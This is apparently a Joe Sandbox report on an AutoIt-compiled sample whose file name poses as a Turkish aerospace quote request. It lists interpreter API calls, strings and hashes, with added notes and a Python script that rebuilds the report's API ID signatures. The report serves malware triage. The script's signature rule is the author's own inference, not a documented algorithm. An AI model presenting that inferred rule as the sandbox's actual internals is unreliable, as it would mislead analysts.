• Instruction ID: 6cb34f0b771f67f848a5c06ba3f605adb01256967813ea12ba58b39c069a1e6f
• Opcode Fuzzy Hash: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
• Instruction Fuzzy Hash: B6A161B1A40215BFEB24DFA5DC4AFAF7BB9EB05750F104114FA54A72D4C6B9AD00CB60
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100AD1E
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0102FAC0,?,\\.\,0102F910), ref: 0100ADFB
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0102FAC0,?,\\.\,0102F910), ref: 0100AF59
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01029AD2
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01029B8B
• SendMessageW.USER32(?,00001102,00000002,?), ref: 01029BA7
Strings
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
APIs
• GetSysColor.USER32(00000012), ref: 0102A903
• SetTextColor.GDI32(?,?), ref: 0102A907
• GetSysColorBrush.USER32(0000000F), ref: 0102A91D
• GetSysColor.USER32(0000000F), ref: 0102A928
• CreateSolidBrush.GDI32(?), ref: 0102A92D
• GetSysColor.USER32(00000011), ref: 0102A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
• SelectObject.GDI32(?,00000000), ref: 0102A964
• SetBkColor.GDI32(?,00000000), ref: 0102A96D
• SelectObject.GDI32(?,?), ref: 0102A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0102AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 0102AA32
• DrawFocusRect.USER32(?,?), ref: 0102AA3D
• GetSysColor.USER32(00000011), ref: 0102AA4B
• SetTextColor.GDI32(?,00000000), ref: 0102AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0102AA67
• SelectObject.GDI32(?,0102A5FA), ref: 0102AA7E
• DeleteObject.GDI32(?), ref: 0102AA89
• SelectObject.GDI32(?,?), ref: 0102AA8F
• DeleteObject.GDI32(?), ref: 0102AA94
• SetTextColor.GDI32(?,?), ref: 0102AA9A
• SetBkColor.GDI32(?,?), ref: 0102AAA4
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01028AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028AD2
• CharNextW.USER32(0000014E), ref: 01028B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01028B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01028B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01028B86
• SetWindowTextW.USER32(?,0000014E), ref: 01028BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01028BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 01028C1F
• _memset.LIBCMT ref: 01028C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01028C8D
• _memset.LIBCMT ref: 01028CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 01028D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 01028D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 01028E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 01028E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028EB4
• DrawMenuBar.USER32(?), ref: 01028EC3
• SetWindowTextW.USER32(?,0000014E), ref: 01028EEB
Strings
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
APIs
• GetCursorPos.USER32(?), ref: 010249CA
• GetDesktopWindow.USER32 ref: 010249DF
• GetWindowRect.USER32(00000000), ref: 010249E6
• GetWindowLongW.USER32(?,000000F0), ref: 01024A48
• DestroyWindow.USER32(?), ref: 01024A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01024A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01024ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01024AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 01024AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01024B09
• IsWindowVisible.USER32(?), ref: 01024B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01024B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01024B58
• GetWindowRect.USER32(?,?), ref: 01024B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 01024B96
• GetMonitorInfoW.USER32(00000000,?), ref: 01024BB0
• CopyRect.USER32(?,?), ref: 01024BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 01024C32
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
• Instruction ID: e112900584e1e8d54598f36910ef1a78a4725ce1726e8229aa915d8461d6acff
• Opcode Fuzzy Hash: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
• Instruction Fuzzy Hash: 19B1A970608351AFDB54DF68C888B6ABBE4FF89310F008A1CF9D99B291D775E805CB95
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 010044AC
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010044D2
• _wcscpy.LIBCMT ref: 01004500
• _wcscmp.LIBCMT ref: 0100450B
• _wcscat.LIBCMT ref: 01004521
• _wcsstr.LIBCMT ref: 0100452C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01004548
• _wcscat.LIBCMT ref: 01004591
• _wcscat.LIBCMT ref: 01004598
• _wcsncpy.LIBCMT ref: 010045C3
Strings
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: 1398c7e66f9e829a5746907df8e88d0443689f940e68ff53fc28750835dc0d44
• Instruction ID: c41b25f83a64257a76bd3c2a1e7819175bfb5f0ae39f4196262be43704a11a5b
• Opcode Fuzzy Hash: 1398c7e66f9e829a5746907df8e88d0443689f940e68ff53fc28750835dc0d44
• Instruction Fuzzy Hash: 3F412871940202BAEB11AA75CD03FBF77BCDF45750F04445EFA41E6182EF39AA01A6A9
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28BC
• GetSystemMetrics.USER32(00000007), ref: 00FA28C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28EF
• GetSystemMetrics.USER32(00000008), ref: 00FA28F7
• GetSystemMetrics.USER32(00000004), ref: 00FA291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FA2939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FA2949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FA297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FA2990
• GetClientRect.USER32(00000000,000000FF), ref: 00FA29AE
• GetStockObject.GDI32(00000011), ref: 00FA29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA29D5
  • Part of subcall function 00FA2344: GetCursorPos.USER32(?), ref: 00FA2357
  • Part of subcall function 00FA2344: ScreenToClient.USER32(010657B0,?), ref: 00FA2374
  • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000001), ref: 00FA2399
  • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
• SetTimer.USER32(00000000,00000000,00000028,00FA1256), ref: 00FA29FC
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
• Instruction ID: 844bb4d1f33365299abaa2bf2cff98980047e73a52773a858566ca88371e1f4d
• Opcode Fuzzy Hash: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
• Instruction Fuzzy Hash: 32B19F71A0020AEFDB24DFA8DC45BAE7BB5FB08350F10422AFA55E7294DB79D841DB50
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00FFA47A
• __swprintf.LIBCMT ref: 00FFA51B
• _wcscmp.LIBCMT ref: 00FFA52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FFA583
• _wcscmp.LIBCMT ref: 00FFA5BF
• GetClassNameW.USER32(?,?,00000400), ref: 00FFA5F6
• GetDlgCtrlID.USER32(?), ref: 00FFA648
• GetWindowRect.USER32(?,?), ref: 00FFA67E
• GetParent.USER32(?), ref: 00FFA69C
• ScreenToClient.USER32(00000000), ref: 00FFA6A3
• GetClassNameW.USER32(?,?,00000100), ref: 00FFA71D
• _wcscmp.LIBCMT ref: 00FFA731
• GetWindowTextW.USER32(?,?,00000400), ref: 00FFA757
• _wcscmp.LIBCMT ref: 00FFA76B
  • Part of subcall function 00FC362C: _iswctype.LIBCMT ref: 00FC3634
Strings
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
• Instruction ID: 334840f84904656b8323df249f60a2a5fa7110335cbb34aa756d06357b343ec6
• Opcode Fuzzy Hash: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
• Instruction Fuzzy Hash: 14A1D3B260430BABD714EF60C884FBAB7E8FF44354F148519EA9DD2160DB34E945DB92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 00FFAF18
• _wcscmp.LIBCMT ref: 00FFAF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 00FFAF51
• CharUpperBuffW.USER32(?,00000000), ref: 00FFAF6E
• _wcscmp.LIBCMT ref: 00FFAF8C
• _wcsstr.LIBCMT ref: 00FFAF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00FFAFD5
• _wcscmp.LIBCMT ref: 00FFAFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00FFB00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00FFB055
• _wcscmp.LIBCMT ref: 00FFB065
• GetClassNameW.USER32(00000010,?,00000400), ref: 00FFB08D
• GetWindowRect.USER32(00000004,?), ref: 00FFB0F6
Strings
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
• Instruction ID: 6cf4e9a3cc198a3ad7b8629fa11373839c71db32af288262981aff68e5582b20
• Opcode Fuzzy Hash: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
• Instruction Fuzzy Hash: 1881C1B140830A9BDB14DF10C885FBA77E8EF44764F148469FE898A0A5DB34DD49EB61
APIs
Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                    • Opcode ID: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                                                                                    • Instruction ID: ea5ce1e509f04e586d2a5867b075fbfb7dd4380f7a6b792a2c81cb1d61841b3b
                                                                                                                                    • Opcode Fuzzy Hash: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                                                                                    • Instruction Fuzzy Hash: 2E31B0B1A44209A6DB14FBA1DE43FBF77A4AF10760FA0001CB945750A5EB55AF04F652
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 01015013
• LoadCursorW.USER32(00000000,00007F00), ref: 0101501E
• LoadCursorW.USER32(00000000,00007F03), ref: 01015029
• LoadCursorW.USER32(00000000,00007F8B), ref: 01015034
• LoadCursorW.USER32(00000000,00007F01), ref: 0101503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0101504A
• LoadCursorW.USER32(00000000,00007F88), ref: 01015055
• LoadCursorW.USER32(00000000,00007F80), ref: 01015060
• LoadCursorW.USER32(00000000,00007F86), ref: 0101506B
• LoadCursorW.USER32(00000000,00007F83), ref: 01015076
• LoadCursorW.USER32(00000000,00007F85), ref: 01015081
• LoadCursorW.USER32(00000000,00007F82), ref: 0101508C
• LoadCursorW.USER32(00000000,00007F84), ref: 01015097
• LoadCursorW.USER32(00000000,00007F04), ref: 010150A2
• LoadCursorW.USER32(00000000,00007F02), ref: 010150AD
• LoadCursorW.USER32(00000000,00007F89), ref: 010150B8
• GetCursorInfo.USER32(?), ref: 010150C8
Note: the sixteen LoadCursorW resource IDs are the standard IDC_* cursors (0x7F00 IDC_ARROW, 0x7F01 IDC_IBEAM, 0x7F02 IDC_WAIT, 0x7F03 IDC_CROSS, 0x7F04 IDC_UPARROW, 0x7F80 IDC_SIZE, 0x7F81 IDC_ICON, 0x7F82 IDC_SIZENWSE, 0x7F83 IDC_SIZENESW, 0x7F84 IDC_SIZEWE, 0x7F85 IDC_SIZENS, 0x7F86 IDC_SIZEALL, 0x7F88 IDC_NO, 0x7F89 IDC_HAND, 0x7F8A IDC_APPSTARTING, 0x7F8B IDC_HELP). They are loaded in the order of AutoIt's MouseGetCursor() return codes 1 to 16 and compared with the hCursor that GetCursorInfo reports. The routine only identifies the current cursor shape; it captures neither keystrokes nor the screen.
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
• Instruction ID: 951fc081ab20b3c37b8779f8a312764ae4b813816e1a4847adb432471f87efd9
• Opcode Fuzzy Hash: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
• Instruction Fuzzy Hash: 393115B1D0831A6ADF609FBA8C8985EBFF8FF04750F50452AE54CEB280DA7C65008F91
APIs
• _memset.LIBCMT ref: 0102A259
• DestroyWindow.USER32(?,?), ref: 0102A2D3
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0102A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0102A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A382
• DestroyWindow.USER32(00000000), ref: 0102A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 0102A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A3F4
• GetDesktopWindow.USER32 ref: 0102A40D
• GetWindowRect.USER32(00000000), ref: 0102A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0102A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0102A444
  • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
Note: CreateWindowExW is called with WS_EX_TOPMOST (0x8), the common-controls class tooltips_class32 and CW_USEDEFAULT (0x80000000) for position and size; the SendMessageW calls are TTM_DELTOOLW (0x433), TTM_ADDTOOLW (0x432, lParam 0x30 is the TOOLINFOW size), TTM_SETMAXTIPWIDTH (0x418) and TTM_SETTITLEW (0x421). This is the AutoIt ToolTip() implementation, a display routine with no collection or exfiltration role.
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
• Instruction ID: 6c49d2afdca8d2be619a202bdf88c52bdc4ba47e8a2fa490ef89000a1056db08
• Opcode Fuzzy Hash: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
• Instruction Fuzzy Hash: E6719A75240205AFE721CF28CC49F6A7BE5FB89740F04455CFAC5976A0CB79E906CB62
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• DragQueryPoint.SHELL32(?,?), ref: 0102C627
  • Part of subcall function 0102AB37: ClientToScreen.USER32(?,?), ref: 0102AB60
  • Part of subcall function 0102AB37: GetWindowRect.USER32(?,?), ref: 0102ABD6
  • Part of subcall function 0102AB37: PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0102C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0102C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0102C6BE
• _wcscat.LIBCMT ref: 0102C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0102C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0102C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0102C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0102C757
• DragFinish.SHELL32(?), ref: 0102C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0102C851
Note: this is the WM_DROPFILES (0x233) handler of an AutoIt GUI window. DragQueryPoint and the PtInRect subcall locate the control under the drop, DragQueryFileW reads each dropped path into a MAX_PATH (0x104) buffer, and EM_GETSEL (0xB0), EM_REPLACESEL (0xC2) and EM_SETSEL (0xB1) paste it into an edit control. @GUI_DRAGFILE, @GUI_DRAGID and @GUI_DROPID are the AutoIt macros the runtime fills in for the script.
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
• Instruction ID: bbf90f7753c11733a0ba7c42b59dbc002f193c2d3b3863138e8607b5aa94773f
• Opcode Fuzzy Hash: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
• Instruction Fuzzy Hash: AA618971108301AFC721EF64CD89DAFBBF8EF89790F40091EF591961A1DB75AA09CB52
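The "API ID" printed under "Similarity" for each function is derived from its "APIs" listing, which is what makes it useful for matching the same runtime routine across samples. The following Python script, added here as an example and not part of Joe Sandbox or of this report, parses an "APIs" block in the format shown above and rebuilds that signature. The tokenisation rule (split the export name on CamelCase, drop words shorter than four characters, keep C-runtime names whole, count over direct and subcall APIs, group by frequency, ASCII-sort within a group, join groups with "$") was inferred from the signatures on this page and is an assumption about the sandbox's internals, not a documented algorithm; it reproduces the tooltip and drag-and-drop signatures above. The numeric "API String ID" pair uses an unknown hash and is not reproduced. The embedded input is the tooltip routine's "APIs" block copied from this section.

```python
"""Rebuild a Joe Sandbox "API ID" from a function's "APIs" listing.

Added example, not Joe Sandbox code. The token rule in api_tokens() and the
grouping rule in api_id() are inferred from the signatures printed in this
report and are assumptions about the sandbox's internals.
"""
import re
from collections import Counter
from dataclasses import dataclass

# One API-call line as printed in the report: optional "Part of subcall
# function XXXX:" prefix, Name.MODULE, optional "(args)", then "ref: ADDR".
_API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    subcall: bool


def parse_api_block(text: str) -> list:
    """Return the ApiCall entries of one function's "APIs" block."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.search(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            calls.append(ApiCall(m["name"], m["module"], args,
                                 int(m["ref"], 16), "subcall" in line))
    return calls


def api_tokens(name: str) -> list:
    """Split a Win32 export name into CamelCase words and drop words shorter
    than four characters (Get, Ex, W, To, Sys, ...). CRT names such as
    _memset or __swprintf are kept whole. Inferred rule, see module docstring."""
    if name.startswith("_"):
        return [name]
    return [t for t in re.findall(r"[A-Z][a-z]*|\d+", name) if len(t) >= 4]


def api_id(calls) -> str:
    """Count tokens over every call, subcalls included; emit frequency groups
    from most to least frequent, tokens inside a group concatenated in ASCII
    order, groups joined by '$'."""
    counts = Counter(t for c in calls for t in api_tokens(c.name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def modules(calls) -> set:
    """Modules the function imports from, a cheap triage field."""
    return {c.module for c in calls}


# Constructed input: the "APIs" block of the ToolTip routine, copied verbatim
# from this report section.
TOOLTIP_FUNC = """\
APIs
• _memset.LIBCMT ref: 0102A259
• DestroyWindow.USER32(?,?), ref: 0102A2D3
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0102A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0102A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A382
• DestroyWindow.USER32(00000000), ref: 0102A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 0102A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A3F4
• GetDesktopWindow.USER32 ref: 0102A40D
• GetWindowRect.USER32(00000000), ref: 0102A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0102A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0102A444
  • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
"""

if __name__ == "__main__":
    calls = parse_api_block(TOOLTIP_FUNC)
    print(len(calls), "calls from", sorted(modules(calls)))
    print("API ID:", api_id(calls))
```

Because the signature ignores argument values and addresses, two builds of the AutoIt runtime yield the same API ID for the same routine; that is what lets an analyst skip runtime stubs quickly, and also why an API ID on its own never identifies the malware family.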
APIs
• VariantInit.OLEAUT32(00000000), ref: 01007D5F
• VariantCopy.OLEAUT32(00000000,?), ref: 01007D68
• VariantClear.OLEAUT32(00000000), ref: 01007D74
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01007E62
• __swprintf.LIBCMT ref: 01007E92
• VarR8FromDec.OLEAUT32(?,?), ref: 01007EBE
• VariantInit.OLEAUT32(?), ref: 01007F6F
• SysFreeString.OLEAUT32(00000016), ref: 01008003
• VariantClear.OLEAUT32(?), ref: 0100805D
• VariantClear.OLEAUT32(?), ref: 0100806C
• VariantInit.OLEAUT32(00000000), ref: 010080AA
Note: this converts a COM VARIANT into an AutoIt value. A VT_DATE is turned into a SYSTEMTIME by VariantTimeToSystemTime and formatted with "%4d%02d%02d%02d%02d%02d" (YYYYMMDDHHMMSS), a VT_DECIMAL goes through VarR8FromDec, and "Default" is AutoIt's keyword for an omitted COM argument. It is the interpreter's object-handling code, not sample logic.
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: a12015d819c61eba3dfcc2ad2443f4c9263df296cdb3477f965041b215e6e9f1
